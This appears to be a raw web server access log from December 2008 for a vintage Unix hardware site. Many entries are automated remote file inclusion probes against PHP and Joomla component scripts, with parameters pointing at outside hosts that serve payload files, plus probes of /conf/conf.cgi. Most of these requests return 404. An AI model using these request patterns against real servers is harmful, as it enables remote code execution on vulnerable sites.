218.239.45.154 - - [14/Dec/2008:05:31:37 -0500] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 247
195.234.106.106 - - [14/Dec/2008:05:31:39 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://killearnlakeshoa.org/calendar/includes/.bash/id.txt? HTTP/1.1" 404 240
195.234.106.106 - - [14/Dec/2008:05:32:09 -0500] "GET //components/com_forum/download.php?phpbb_root_path=http://killearnlakeshoa.org/calendar/includes/.bash/id.txt? HTTP/1.1" 404 240
81.52.143.15 - - [14/Dec/2008:05:33:41 -0500] "GET /robots.txt HTTP/1.1" 404 216
81.52.143.15 - - [14/Dec/2008:05:33:48 -0500] "GET /sunFAQ/faq_framebuffer/fbfaq_files/cg14config HTTP/1.1" 200 13752
38.98.243.130 - - [14/Dec/2008:05:34:18 -0500] "GET /logs/error_log.2/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 273
38.98.243.130 - - [14/Dec/2008:05:34:18 -0500] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 256
38.98.243.130 - - [14/Dec/2008:05:34:18 -0500] "GET /logs/access_log.2/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 274
38.98.243.130 - - [14/Dec/2008:05:34:21 -0500] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 261
38.98.243.130 - - [14/Dec/2008:05:34:27 -0500] "GET /logs/error_log.2/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 272
38.98.243.130 - - [14/Dec/2008:05:34:27 -0500] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 255
38.98.243.130 - - [14/Dec/2008:05:34:27 -0500] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 260
38.98.243.130 - - [14/Dec/2008:05:34:27 -0500] "GET /logs/access_log.2/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 273
38.98.243.130 - - [14/Dec/2008:05:35:04 -0500] "GET /logs/error_log.3/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 263
38.98.243.130 - - [14/Dec/2008:05:35:04 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 246
38.98.243.130 - - [14/Dec/2008:05:35:04 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 251
72.35.84.90 - - [14/Dec/2008:05:35:16 -0500] "GET /logs/access_log.4//index.php?DOCUMENT_ROOT=http://www.geocities.com/cwx.shadow/idx.txt???? HTTP/1.1" 404 234
72.35.84.90 - - [14/Dec/2008:05:35:16 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.geocities.com/cwx.shadow/idx.txt???? HTTP/1.1" 404 216
72.35.84.90 - - [14/Dec/2008:05:35:17 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geocities.com/cwx.shadow/idx.txt???? HTTP/1.1" 404 221
38.98.243.130 - - [14/Dec/2008:05:35:18 -0500] "GET /logs/error_log.2/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 263
38.98.243.130 - - [14/Dec/2008:05:35:18 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 246
38.98.243.130 - - [14/Dec/2008:05:35:18 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 251
200.27.116.182 - - [14/Dec/2008:05:35:39 -0500] "GET /logs/access_log.4//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 262
200.27.116.182 - - [14/Dec/2008:05:35:39 -0500] "GET //mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 244
200.27.116.182 - - [14/Dec/2008:05:35:40 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 249
194.8.74.11 - - [14/Dec/2008:05:36:10 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.74.11 - - [14/Dec/2008:05:36:10 -0500] "GET / HTTP/1.0" 200 12547
194.8.74.11 - - [14/Dec/2008:05:36:11 -0500] "GET /conf/ HTTP/1.0" 200 47
69.139.182.137 - - [14/Dec/2008:05:37:34 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
207.255.116.38 - - [14/Dec/2008:05:37:57 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
218.239.45.154 - - [14/Dec/2008:05:37:58 -0500] "GET /logs/error_log%20%20//skin/zero_vote/error.php?dir=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 248
218.239.45.154 - - [14/Dec/2008:05:38:21 -0500] "GET /logs/access_log%20%20//skin/zero_vote/error.php?dir=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 249
210.0.186.231 - - [14/Dec/2008:05:39:10 -0500] "GET /logs/error_log.3/convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 239
210.0.186.231 - - [14/Dec/2008:05:39:11 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 222
210.0.186.231 - - [14/Dec/2008:05:39:11 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 227
210.0.186.231 - - [14/Dec/2008:05:39:12 -0500] "GET /logs/error_log.3/convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 239
210.0.186.231 - - [14/Dec/2008:05:39:13 -0500] "GET /convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 222
210.0.186.231 - - [14/Dec/2008:05:39:14 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://www.bdsm-franken.de/f2/Cal//tools/rfi/id.txt? HTTP/1.1" 404 227
85.31.1.46 - - [14/Dec/2008:05:40:25 -0500] "GET /logs/access_log.4//twindow_notice.php?shop_this_skin_path=http://www.lowa.at/mraneti.txt??? HTTP/1.1" 404 243
85.31.1.46 - - [14/Dec/2008:05:40:25 -0500] "GET //twindow_notice.php?shop_this_skin_path=http://www.lowa.at/mraneti.txt??? HTTP/1.1" 404 225
85.31.1.46 - - [14/Dec/2008:05:40:26 -0500] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.lowa.at/mraneti.txt??? HTTP/1.1" 404 230
66.40.52.33 - - [14/Dec/2008:05:40:29 -0500] "GET /logs/access_log.4/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 268
66.40.52.33 - - [14/Dec/2008:05:40:29 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 250
66.40.52.33 - - [14/Dec/2008:05:40:29 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 255
38.98.243.130 - - [14/Dec/2008:05:40:30 -0500] "GET /logs/error_log.1%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 274
38.98.243.130 - - [14/Dec/2008:05:40:30 -0500] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 261
38.98.243.130 - - [14/Dec/2008:05:40:33 -0500] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 256
38.98.243.130 - - [14/Dec/2008:05:40:39 -0500] "GET /logs/error_log.1%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 273
38.98.243.130 - - [14/Dec/2008:05:40:39 -0500] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 260
38.98.243.130 - - [14/Dec/2008:05:40:39 -0500] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 255
66.40.52.33 - - [14/Dec/2008:05:40:47 -0500] "GET /logs/access_log.4/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 268
66.40.52.33 - - [14/Dec/2008:05:40:47 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 250
66.40.52.33 - - [14/Dec/2008:05:40:47 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 255
66.7.199.184 - - [14/Dec/2008:05:40:50 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 222
66.7.199.184 - - [14/Dec/2008:05:40:50 -0500] "GET /phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 217
194.8.75.103 - - [14/Dec/2008:05:40:54 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.103 - - [14/Dec/2008:05:40:55 -0500] "GET / HTTP/1.0" 200 12547
66.7.199.184 - - [14/Dec/2008:05:41:02 -0500] "GET /logs/error_log.3/phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 234
194.8.75.103 - - [14/Dec/2008:05:41:03 -0500] "GET /conf/ HTTP/1.0" 200 47
66.40.52.33 - - [14/Dec/2008:05:41:21 -0500] "GET /logs/error_log.3/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 267
66.40.52.33 - - [14/Dec/2008:05:41:21 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 255
66.40.52.33 - - [14/Dec/2008:05:41:21 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 250
38.98.243.130 - - [14/Dec/2008:05:41:22 -0500] "GET /logs/error_log.2%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 264
66.199.253.186 - - [14/Dec/2008:05:41:25 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
72.46.128.114 - - [14/Dec/2008:05:41:56 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
66.40.52.33 - - [14/Dec/2008:05:42:00 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 255
66.40.52.33 - - [14/Dec/2008:05:42:00 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 250
66.40.52.33 - - [14/Dec/2008:05:42:03 -0500] "GET /logs/error_log.3/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.geocities.com/sijabirong/id2.txt?%0D?? HTTP/1.1" 404 267
211.236.180.100 - - [14/Dec/2008:05:42:10 -0500] "GET /logs/error_log.1/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 278
211.236.180.100 - - [14/Dec/2008:05:42:10 -0500] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 261
211.236.180.100 - - [14/Dec/2008:05:42:10 -0500] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 266
66.199.246.178 - - [14/Dec/2008:05:42:11 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
211.236.180.100 - - [14/Dec/2008:05:42:48 -0500] "GET /logs/access_log.2/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 279
211.236.180.100 - - [14/Dec/2008:05:42:48 -0500] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 261
211.236.180.100 - - [14/Dec/2008:05:42:48 -0500] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 266
66.7.199.184 - - [14/Dec/2008:05:43:05 -0500] "GET /phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 217
66.7.199.184 - - [14/Dec/2008:05:43:10 -0500] "GET /logs/error_log.4/phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 234
66.7.199.184 - - [14/Dec/2008:05:43:10 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 222
80.55.171.90 - - [14/Dec/2008:05:43:33 -0500] "GET /logs/access_log.4//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 258
80.55.171.90 - - [14/Dec/2008:05:43:33 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 240
80.55.171.90 - - [14/Dec/2008:05:43:33 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 245
81.52.143.16 - - [14/Dec/2008:05:43:39 -0500] "GET /robots.txt HTTP/1.1" 404 216
66.7.199.184 - - [14/Dec/2008:05:43:56 -0500] "GET /logs/error_log.3/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 262
66.7.199.184 - - [14/Dec/2008:05:43:57 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 245
66.7.199.184 - - [14/Dec/2008:05:43:57 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 250
81.52.143.16 - - [14/Dec/2008:05:44:04 -0500] "GET /sun3/kernel/sun3_160bc.html HTTP/1.1" 200 3013
94.163.8.231 - - [14/Dec/2008:05:44:46 -0500] "GET /sun_ss2/sun4_75.gif HTTP/1.1" 200 5693
65.55.230.169 - - [14/Dec/2008:05:45:02 -0500] "GET /docs/which-2.8/?D=A HTTP/1.1" 200 733
65.55.230.169 - - [14/Dec/2008:05:45:17 -0500] "GET /docs/vim-common-5.4/syntax/sh.vim HTTP/1.1" 200 16215
65.55.230.169 - - [14/Dec/2008:05:45:18 -0500] "GET /docs/minicom-1.82.1/demos/unixlogin HTTP/1.1" 200 1246
66.7.199.184 - - [14/Dec/2008:05:45:51 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 250
66.7.199.184 - - [14/Dec/2008:05:45:55 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 245
66.7.199.184 - - [14/Dec/2008:05:45:59 -0500] "GET /logs/access_log.3/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.ndiedu.com/demo/kboard/setup/id.txt??? HTTP/1.1" 404 263
65.55.230.169 - - [14/Dec/2008:05:46:09 -0500] "GET /docs/pine-4.10/contrib/ports/vms/vmsbuild_cclient.com HTTP/1.1" 200 4266
194.8.75.107 - - [14/Dec/2008:05:46:28 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.107 - - [14/Dec/2008:05:46:28 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.107 - - [14/Dec/2008:05:46:29 -0500] "GET /conf/ HTTP/1.0" 200 47
218.239.45.154 - - [14/Dec/2008:05:46:49 -0500] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 264
218.239.45.154 - - [14/Dec/2008:05:46:49 -0500] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 269
218.239.45.154 - - [14/Dec/2008:05:46:49 -0500] "GET /logs/error_log.3/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.keys4life.fanfilled.com/cutenews/idxx.txt?? HTTP/1.1" 404 281
194.8.75.175 - - [14/Dec/2008:05:47:00 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.175 - - [14/Dec/2008:05:47:00 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.175 - - [14/Dec/2008:05:47:02 -0500] "GET /conf/ HTTP/1.0" 200 47
85.31.1.46 - - [14/Dec/2008:05:47:28 -0500] "GET /logs/error_log//twindow_notice.php?shop_this_skin_path=http://www.lowa.at/mraneti.txt??? HTTP/1.1" 404 240
85.31.1.46 - - [14/Dec/2008:05:47:28 -0500] "GET //twindow_notice.php?shop_this_skin_path=http://www.lowa.at/mraneti.txt??? HTTP/1.1" 404 225
85.31.1.46 - - [14/Dec/2008:05:47:29 -0500] "GET /logs//twindow_notice.php?shop_this_skin_path=http://www.lowa.at/mraneti.txt??? HTTP/1.1" 404 230
217.20.112.198 - - [14/Dec/2008:05:47:38 -0500] "POST /conf/conf.cgi HTTP/1.1" 404 219
76.177.34.209 - - [14/Dec/2008:05:47:50 -0500] "GET /conf/conf.cgi HTTP/1.1" 404 219
194.8.75.247 - - [14/Dec/2008:05:48:28 -0500] "GET /conf/conf.cgi HTTP/1.0" 404 207
194.8.75.247 - - [14/Dec/2008:05:48:29 -0500] "GET / HTTP/1.0" 200 12547
194.8.75.247 - - [14/Dec/2008:05:48:29 -0500] "GET /conf/ HTTP/1.0" 200 47
66.118.142.60 - - [14/Dec/2008:05:48:50 -0500] "GET /main.php?GLOBALS[PT_Config][dir][data]http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 214
66.118.142.60 - - [14/Dec/2008:05:48:50 -0500] "GET /logs/main.php?GLOBALS[PT_Config][dir][data]http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 219
66.118.142.60 - - [14/Dec/2008:05:48:50 -0500] "GET /logs/access_log/main.php?GLOBALS[PT_Config][dir][data]http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 230
66.118.142.60 - - [14/Dec/2008:05:48:58 -0500] "GET /main.php?GLOBALS[PT_Config][dir][data]http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 214
66.118.142.60 - - [14/Dec/2008:05:48:58 -0500] "GET /logs/main.php?GLOBALS[PT_Config][dir][data]http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 219
66.118.142.60 - - [14/Dec/2008:05:48:58 -0500] "GET /logs/error_log/main.php?GLOBALS[PT_Config][dir][data]http://www.keys4life.fanfilled.com/cutenews/fellid.txt?? HTTP/1.1" 404 229
89.149.227.201 - - [14/Dec/2008:05:50:10 -0500] "POST /conf/conf.cgi HTTP/1.0" 404 207
222.106.75.177 - - [14/Dec/2008:05:50:27 -0500] "GET / HTTP/1.1" 200 12547
222.106.75.177 - - [14/Dec/2008:05:50:28 -0500] "GET /about.html HTTP/1.1" 200 4981
222.106.75.177 - - [14/Dec/2008:05:50:28 -0500] "GET /bogomips.html HTTP/1.1" 200 8377
222.106.75.177 - - [14/Dec/2008:05:50:29 -0500] "GET /links.html HTTP/1.1" 200 4922
222.106.75.177 - - [14/Dec/2008:05:50:29 -0500] "GET /news.html HTTP/1.1" 200 6754
222.106.75.177 - - [14/Dec/2008:05:50:29 -0500] "GET /bookmarks_public.html HTTP/1.1" 200 50362
222.106.75.177 - - [14/Dec/2008:05:50:31 -0500] "GET /index.html HTTP/1.1" 200 12547
222.106.75.177 - - [14/Dec/2008:05:50:32 -0500] "GET /bookstore.html HTTP/1.1" 200 8010
222.106.75.177 - - [14/Dec/2008:05:50:33 -0500] "GET /conf HTTP/1.1" 301 245
222.106.75.177 - - [14/Dec/2008:05:50:33 -0500] "GET /conf/ HTTP/1.1" 200 47
222.106.75.177 - - [14/Dec/2008:05:50:34 -0500] "GET /dec HTTP/1.1" 301 244
222.106.75.177 - - [14/Dec/2008:05:50:34 -0500] "GET /dec/ HTTP/1.1" 200 7898
222.106.75.177 - - [14/Dec/2008:05:50:35 -0500] "GET /dec/declinks.html HTTP/1.1" 200 1737
222.106.75.177 - - [14/Dec/2008:05:50:35 -0500] "GET /fc HTTP/1.1" 301 243
222.106.75.177 - - [14/Dec/2008:05:50:36 -0500] "GET /fc/ HTTP/1.1" 200 7383
222.106.75.177 - - [14/Dec/2008:05:50:37 -0500] "GET /next HTTP/1.1" 301 245
222.106.75.177 - - [14/Dec/2008:05:50:37 -0500] "GET /next/ HTTP/1.1" 200 6924
222.106.75.177 - - [14/Dec/2008:05:50:38 -0500] "GET /sgiFAQ HTTP/1.1" 301 247
222.106.75.177 - - [14/Dec/2008:05:50:38 -0500] "GET /sgiFAQ/ HTTP/1.1" 200 4281
222.106.75.177 - - [14/Dec/2008:05:50:39 -0500] "GET /sgi_indigo HTTP/1.1" 301 251
222.106.75.177 - - [14/Dec/2008:05:50:39 -0500] "GET /sgi_indigo/ HTTP/1.1" 200 9048
222.106.75.177 - - [14/Dec/2008:05:50:40 -0500] "GET /sgi_indigo2 HTTP/1.1" 301 252
222.106.75.177 - - [14/Dec/2008:05:50:41 -0500] "GET /sgi_indigo2/ HTTP/1.1" 200 12751
74.6.22.110 - - [14/Dec/2008:05:50:41 -0500] "GET /robots.txt HTTP/1.0" 404 204
222.106.75.177 - - [14/Dec/2008:05:50:42 -0500] "GET /sgi_indy HTTP/1.1" 301 249
74.6.22.110 - - [14/Dec/2008:05:50:42 -0500] "GET /docs/ghostscript-5.10/?M=D HTTP/1.0" 200 3531
222.106.75.177 - - [14/Dec/2008:05:50:42 -0500] "GET /sgi_indy/ HTTP/1.1" 200 6745
222.106.75.177 - - [14/Dec/2008:05:50:43 -0500] "GET /sgi_iris HTTP/1.1" 301 249
222.106.75.177 - - [14/Dec/2008:05:50:43 -0500] "GET /sgi_iris/ HTTP/1.1" 200 8143
222.106.75.177 - - [14/Dec/2008:05:50:44 -0500] "GET /sun3 HTTP/1.1" 301 245
222.106.75.177 - - [14/Dec/2008:05:50:44 -0500] "GET /sun3/ HTTP/1.1" 200 5383
222.106.75.177 - - [14/Dec/2008:05:50:45 -0500] "GET /sun380 HTTP/1.1" 301 247
222.106.75.177 - - [14/Dec/2008:05:50:45 -0500] "GET /sun380/ HTTP/1.1" 200 7888
222.106.75.177 - - [14/Dec/2008:05:50:46 -0500] "GET /sunFAQ HTTP/1.1" 301 247
222.106.75.177 - - [14/Dec/2008:05:50:47 -0500] "GET /sunFAQ/ HTTP/1.1" 200 8342
222.106.75.177 - - [14/Dec/2008:05:50:47 -0500] "GET /sunPICS HTTP/1.1" 301 248
222.106.75.177 - - [14/Dec/2008:05:50:48 -0500] "GET /sunPICS/ HTTP/1.1" 200 17863
222.106.75.177 - - [14/Dec/2008:05:50:49 -0500] "GET /sun_ipc HTTP/1.1" 301 248
222.106.75.177 - - [14/Dec/2008:05:50:49 -0500] "GET /sun_ipc/ HTTP/1.1" 200 9825
222.106.75.177 - - [14/Dec/2008:05:50:50 -0500] "GET /sun_ipx HTTP/1.1" 301 248
222.106.75.177 - - [14/Dec/2008:05:50:51 -0500] "GET /sun_ipx/ HTTP/1.1" 200 11586
222.106.75.177 - - [14/Dec/2008:05:50:52 -0500] "GET /sun_lx HTTP/1.1" 301 247
222.106.75.177 - - [14/Dec/2008:05:50:52 -0500] "GET /sun_lx/ HTTP/1.1" 200 6271
222.106.75.177 - - [14/Dec/2008:05:50:53 -0500] "GET /sun_ss10 HTTP/1.1" 301 249
222.106.75.177 - - [14/Dec/2008:05:50:53 -0500] "GET /sun_ss10/ HTTP/1.1" 200 13596
222.106.75.177 - - [14/Dec/2008:05:50:54 -0500] "GET /sun_ss2 HTTP/1.1" 301 248
222.106.75.177 - - [14/Dec/2008:05:50:55 -0500] "GET /sun_ss2/ HTTP/1.1" 200 9016
222.106.75.177 - - [14/Dec/2008:05:50:55 -0500] "GET /sun_ss5 HTTP/1.1" 301 248
222.106.75.177 - - [14/Dec/2008:05:50:56 -0500] "GET /sun_ss5/ HTTP/1.1" 200 14917
222.106.75.177 - - [14/Dec/2008:05:50:58 -0500] "GET /personal/inventory.html HTTP/1.1" 200 15433
222.106.75.177 - - [14/Dec/2008:05:50:59 -0500] "GET /banner.html HTTP/1.1" 404 217
222.106.75.177 - - [14/Dec/2008:05:50:59 -0500] "GET /personal/links.html HTTP/1.1" 200 3613
222.106.75.177 - - [14/Dec/2008:05:51:00 -0500] "GET /personal/vanagon.html HTTP/1.1" 200 2402
222.106.75.177 - - [14/Dec/2008:05:51:00 -0500] "GET /apache HTTP/1.1" 301 247
222.106.75.177 - - [14/Dec/2008:05:51:01 -0500] "GET /apache/ HTTP/1.1" 200 1945
202.182.48.26 - - [14/Dec/2008:05:51:09 -0500] "GET /logs/error_log.2/errors.php?error=http://www.geocities.com/killer_them/idv6.txt????? HTTP/1.0" 404 221
216.180.251.146 - - [14/Dec/2008:05:51:13 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
216.180.251.146 - - [14/Dec/2008:05:51:13 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
216.180.251.146 - - [14/Dec/2008:05:51:13 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
216.180.251.146 - - [14/Dec/2008:05:51:14 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
216.180.251.146 - - [14/Dec/2008:05:51:14 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
216.180.251.146 - - [14/Dec/2008:05:51:14 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
218.38.34.115 - - [14/Dec/2008:05:51:21 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
218.38.34.115 - - [14/Dec/2008:05:51:21 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
218.38.34.115 - - [14/Dec/2008:05:51:22 -0500] "GET /logs//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 239
218.38.34.115 - - [14/Dec/2008:05:51:24 -0500] "GET /logs/access_log.3//BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 252
218.38.34.115 - - [14/Dec/2008:05:51:24 -0500] "GET //BlackList.Examine.class.php?_CONF[path]=http://www.ischeland.de/r0bot.txt???? HTTP/1.1" 404 234
